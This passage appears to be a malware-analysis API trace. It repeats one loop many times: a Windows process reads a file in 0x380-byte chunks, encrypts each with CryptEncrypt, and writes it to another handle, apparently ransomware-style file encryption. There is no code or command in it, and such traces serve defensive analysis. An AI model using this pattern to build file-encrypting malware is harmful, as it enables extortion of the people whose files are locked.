hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.894] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.894] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.894] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.894] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.894] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.895] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.895] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.895] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.895] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.895] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.895] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.895] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.895] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.895] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.895] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.895] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.895] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.896] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.896] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.896] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.896] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.896] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.896] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.896] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.896] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.896] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.896] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.896] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.896] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.897] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.897] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.897] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.897] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.897] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.897] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.897] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.897] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.897] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.897] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.897] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.898] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.898] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.898] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.898] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.898] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.898] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.898] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.898] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.898] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.898] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.898] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.899] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.899] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.899] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.899] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.899] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.899] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.899] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.899] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.899] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.899] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.899] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.900] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.900] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.900] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.900] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.900] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.900] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.900] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.900] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.900] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.900] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.901] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.901] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.901] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.901] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.901] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.901] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.901] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.901] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.901] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.901] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.901] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.901] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.902] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.902] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.902] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.902] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.902] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.902] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.902] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.902] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.902] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.902] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.902] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.902] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.902] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.902] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.903] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.903] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.903] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.903] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 